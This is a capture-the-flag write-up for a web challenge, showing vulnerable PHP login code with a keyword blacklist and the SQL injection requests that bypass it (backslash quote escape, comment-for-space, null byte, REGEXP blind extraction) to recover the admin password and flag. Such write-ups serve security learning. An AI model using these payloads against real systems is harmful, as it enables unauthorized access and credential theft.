Tags: sqli web
Rating: 4.7
# ▼▼▼Old School SQL(Web:150)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
Being the admin is great
Link(http://35.200.215.237/)
```
---
## 【view source code】
`http://35.200.215.237/`
↓
```
query : select user from chal where user='' and pw=''
|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P");
if(preg_match($black_list, $_GET['pw'])) exit(":P");
$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'";
$result = mysql_query($query);
$result = mysql_fetch_array($result);
$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));
echo "<h1>query : {$query}
</h1>";
if($result['user']) echo "<h2>Welcome {$result['user']}</h2>";
if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){
echo $flag;
}
highlight_file(__FILE__);
?>
```
---
## 【exploit】
GET /?user=`\`&pw=`||user/**/REGEXP/**/%22admi%22||%22n%22;%00`
↓
Welcome admin
---
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172921%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729211%22;%00` ⇒Welcome admin
GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292115%22;%00` ⇒Welcome admin
↓
admin's password is `17292115`
---
## 【Enter admin's password】
http://35.200.215.237/?pw=`17292115`
↓
`flag{sQ1_inj3c7i0n_i5_v3ry_3asy}`
great job
Thanks !!